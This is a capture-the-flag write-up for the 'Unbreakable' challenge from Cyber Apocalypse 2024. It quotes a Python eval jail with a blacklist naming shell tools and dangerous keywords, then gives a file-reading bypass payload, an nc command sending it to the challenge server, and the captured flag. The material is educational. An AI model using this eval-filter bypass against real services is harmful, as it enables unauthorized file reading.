Tags: misc 

Rating:

Unbreakble

Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won't be easy. I'm ready for whatever tricks you have up your sleeve!

Writeup

We can send some python code and it will be exeuted:

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%', 
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's', 
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()
  
  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n") 

Just find some command that are not blacklisted:

print(open('flag.txt').read())#

Run it on the server:

echo "print(open('flag.txt').read())#" | nc 94.237.57.155 44218

This is the flag:

HTB{3v4l_0r_3vuln??}
Original writeup (https://github.com/MicheleMosca/CTF/blob/main/Cyber%20Apocalypse%202024/misc/Unbreakable/README.md).